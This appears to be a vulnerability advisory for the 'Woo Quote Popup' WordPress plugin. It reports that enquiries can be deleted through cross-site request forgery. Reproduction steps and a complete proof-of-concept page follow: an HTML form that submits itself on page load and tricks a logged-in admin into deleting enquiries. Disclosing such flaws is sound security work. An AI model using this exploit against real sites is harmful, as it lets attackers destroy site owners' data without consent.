Description The plugin does not have a CSRF check in place when deleting inquiries, which could allow attackers to make a logged in admin delete them via a CSRF attack
1. Make an enquiry from the frontend form
2. Go to "Woo Quote Popup > Enquiry List"
3. Get the ID of an item
4. Add the ID to the following HTML:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=GMWQP&view=list" method="POST">
<input type="text" name="action" value="delete">
<input type="text" name="action2" value="delete">
<input type="text" name="page" value="GMWQP">
<input type="text" name="_wp_http_referer" value="%2Fwp-admin%2Fadmin.php%3Fpage%3DGMWQP%26view%3Dlist">
<input type="text" name="id[]" value="__ADD_ID_HERE__">
<input type="submit" value="submit">
</form>
</body>
```
5. See that the item has been deleted.